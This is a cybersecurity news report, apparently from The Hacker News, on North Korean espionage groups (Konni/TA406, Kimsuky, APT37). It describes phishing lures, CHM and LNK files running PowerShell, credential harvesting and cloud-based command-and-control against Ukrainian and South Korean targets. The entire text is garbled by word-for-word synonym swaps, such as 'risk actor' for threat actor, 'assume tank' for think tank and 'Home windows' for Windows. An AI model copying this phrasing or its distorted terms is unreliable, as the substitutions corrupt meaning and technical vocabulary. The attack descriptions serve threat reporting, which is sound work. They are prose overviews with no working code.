The North Korea-linked risk actor often called Konni APT has been attributed to a phishing marketing campaign concentrating on authorities entities in Ukraine, indicating the risk actor’s concentrating on past Russia.
Enterprise safety agency Proofpoint mentioned the tip objective of the marketing campaign is to gather intelligence on the “trajectory of the Russian invasion.”
“The group’s curiosity in Ukraine follows historic concentrating on of presidency entities in Russia for strategic intelligence gathering functions,” safety researchers Greg Lesnewich, Saher Naumaan, and Mark Kelly mentioned in a report shared with The Hacker Information.
Konni APT, also referred to as Opal Sleet, Osmium, TA406, and Vedalia, is a cyber espionage group that has a historical past of concentrating on entities in South Korea, america, and Russia. It is operational since at the very least 2014.
Assault chains mounted by the risk actor typically contain the usage of phishing emails to distribute malware referred to as Konni RAT (aka UpDog) and redirect recipients to credential harvesting pages. Proofpoint, in an evaluation of the risk group printed in November 2021, assessed TA406 to be one in every of a number of actors that make up the exercise publicly tracked as Kimsuky, Thallium, and Konni Group.
The newest set of assaults documented by the cybersecurity firm entails the usage of phishing emails that impersonate a fictitious senior fellow at a assume tank referred to as the Royal Institute of Strategic Research, which can also be a non-existent group.
The e-mail messages include a hyperlink to a password-protected RAR archive that is hosted on the MEGA cloud service. Opening the RAR archive utilizing a password talked about within the message physique launches an an infection sequence that is engineered to conduct intensive reconnaissance of the compromised machines.
Particularly, current throughout the RAR archive is a CHM file that shows decoy content material associated to former Ukrainian navy chief Valeriy Zaluzhnyi. Ought to the sufferer click on wherever on the web page, a PowerShell command embedded throughout the HTML is executed to succeed in out to an exterior server and obtain a next-stage PowerShell payload.
The newly launched PowerShell script is able to executing numerous instructions to assemble details about the system, encode it utilizing Base64-encoding, and ship it to the identical server.
“The actor despatched a number of phishing emails on consecutive days when the goal didn’t click on the hyperlink, asking the goal if they’d acquired the prior emails and if they might obtain the recordsdata,” the researchers mentioned.
Proofpoint mentioned it additionally noticed an HTML file being straight distributed as an attachment to the phishing messages. On this variation of the assault, the sufferer is instructed to click on on an embedded hyperlink within the HTML file, ensuing within the obtain of a ZIP archive that features a benign PDF and a Home windows shortcut (LNK) file.
When the LNK is run, it executes Base64-encoded PowerShell to drop a Javascript Encoded file referred to as “Themes.jse” utilizing a Visible Primary Script. The JSE malware, in flip, contacts an attacker-controlled URL and runs the response from the server through PowerShell. The precise nature of the payload is at present not recognized.
Moreover, TA406 has been noticed trying to reap credentials by sending faux Microsoft safety alert messages to Ukrainian authorities entities from ProtonMail accounts, warning them of suspicious sign-in exercise from IP addresses situated in america and urging them to confirm the login by visiting a hyperlink.
Whereas the credential harvesting web page has not been recovered, the similar compromised area is claimed to have been used up to now to gather Naver login data.
“These credential harvesting campaigns came about previous to the tried malware deployments and focused a number of the similar customers later focused with the HTML supply marketing campaign,” Proofpoint mentioned. “TA406 could be very seemingly gathering intelligence to assist North Korean management decide the present threat to its forces already within the theatre, in addition to the probability that Russia will request extra troops or armaments.”
“Not like Russian teams who’ve seemingly been tasked with gathering tactical battlefield data and concentrating on of Ukrainian forces in situ, TA406 has usually targeted on extra strategic, political intelligence assortment efforts.”
 |
| Kimsuky Assault Chain Focusing on South Korea |
The disclosure comes because the Konni group has been linked to a complicated multi-stage malware marketing campaign concentrating on entities in South Korea with ZIP archives containing LNK recordsdata, which run PowerShell scripts to extract a CAB archive and finally ship batch script malware able to gathering delicate information and exfiltrating it to a distant server.
The findings additionally dovetail with spear-phishing campaigns orchestrated by Kimsuky to focus on authorities businesses in South Korea by delivering a stealer malware able to establishing command-and-control (C2 or C&C) communications and exfiltrating recordsdata, net browser information, and cryptocurrency pockets data.
 |
| Kimsuky Assault Chain Delivering PEBBLEDASH |
In line with South Korean cybersecurity firm AhnLab, Kimsuky has additionally been noticed propagating PEBBLEDASH as a part of a multi-stage an infection sequence initiated through spear-phishing. The trojan was attributed by the U.S. authorities to the Lazarus Group in Could 2020.
“Whereas the Kimsuky group makes use of numerous forms of malware, within the case of PEBBLEDASH, they execute malware based mostly on an LNK file by spear-phishing within the preliminary entry stage to launch their assaults,” it mentioned.
“They then make the most of a PowerShell script to create a job scheduler and register it for computerized execution. By communication with a Dropbox and TCP socket-based C&C server, the group installs a number of malware and instruments together with PEBBLEDASH.”
Konni and Kimsuky are removed from the one North Korean risk actors to deal with Seoul. As lately as March 2025, South Korean entities have been discovered to be on the receiving finish of one other marketing campaign carried out by APT37, which can also be known as ScarCruft.
Dubbed Operation ToyBox Story, the spear-phishing assaults singled out a number of activists targeted on North Korea, per the Genians Safety Middle (GSC). The primary noticed spear phishing assault occurred on March 8, 2025.
“The e-mail contained a Dropbox hyperlink resulting in a compressed archive that included a malicious shortcut (LNK) file,” the South Korean firm mentioned. “When extracted and executed, the LNK file activated further malware containing the key phrase ‘toy.'”
 |
| APT37 Operation ToyBox Story Assault Chain |
The LNK recordsdata are configured to launch a decoy HWP file and run PowerShell instructions, resulting in the execution of recordsdata named toy03.bat, toy02.bat, and toy01.bat (in that order), the final of which incorporates shellcode to launch RoKRAT, a staple malware related to APT37.
RokRAT is provided to gather system data, seize screenshots, and use three completely different cloud companies, together with pCloud, Yandex, and Dropbox for C2.
“The risk actors exploited legit cloud companies as C2 infrastructure and continued to switch shortcut (LNK) recordsdata whereas specializing in fileless assault methods to evade detection by antivirus software program put in on track endpoints,” Genians mentioned.
